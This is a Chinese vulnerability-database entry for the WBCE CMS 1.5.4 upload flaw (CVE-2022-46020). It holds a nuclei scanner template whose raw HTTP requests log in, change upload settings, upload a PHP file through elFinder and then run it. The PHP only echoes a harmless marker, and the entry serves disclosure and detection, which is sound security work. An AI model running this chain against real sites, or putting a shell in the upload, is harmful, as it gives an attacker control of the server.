漏洞信息
漏洞名称: WBCE CMS v1.5.4 - Remote Code Execution
漏洞编号:
漏洞类型: 文件上传
漏洞等级: 严重
漏洞描述: WBCE CMS是一个开源的内容管理系统,广泛用于构建和管理网站。它提供了用户友好的界面和多种功能,如页面管理、媒体库和模板编辑等,适用于各种规模的网站部署。该系统的v1.5.4版本存在一个严重的远程代码执行漏洞。
漏洞的根源在于WBCE CMS v1.5.4在处理文件上传时,未能正确验证上传文件的类型,导致攻击者可以通过修改上传文件类型来绕过安全限制,上传恶意PHP文件。这种漏洞属于文件上传漏洞,具体表现为服务端对客户端提交的文件类型检查不严格,使得攻击者能够上传并执行任意代码。
成功利用此漏洞的攻击者可以在受影响的系统上执行任意代码,完全控制服务器,进而可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用需要攻击者具有有效的用户凭证,即需要认证后才能进行攻击。由于漏洞的严重性和易用性,它被评定为严重级别。建议用户立即升级到WBCE CMS v1.5.5或更高版本以修复此漏洞。
产品厂商: wbce
产品名称: wbce_cms
影响版本: 1.5.4
来源: https://github.com/projectdiscovery/nuclei-templates/blob/953302e619aede40dca8ce943aa33a853d2d388f/http%2Fcves%2F2022%2FCVE-2022-46020.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
|
id: CVE-2022-46020
info:
name: WBCE CMS v1.5.4 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-46020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
epss-score: 0.84584
epss-percentile: 0.99281
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: wbce
product: wbce_cms
tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive
http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/index.php?advanced=yes HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
- |
POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="reqid"
test
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="cmd"
upload
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php
echo md5("CVE-2022-46020");
?>
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="mtime[]"
1
-----------------------------213974337328367932543216511988--
- |
GET /media/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_6
words:
- 751a8ba516522786d551075a092a7a84
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
extractors:
- type: regex
name: username_fieldname
group: 1
regex:
- name="username_fieldname" value="(.*)"
internal: true
part: body
- type: regex
name: password_fieldname
group: 1
regex:
- name="password_fieldname" value="(.*)"
internal: true
part: body
- type: regex
name: formtoken
group: 1
regex:
- name="formtoken" value="(.*)"
internal: true
part: body
- type: regex
name: app_name
group: 1
regex:
- name="app_name" value="(.*)"
internal: true
part: body
|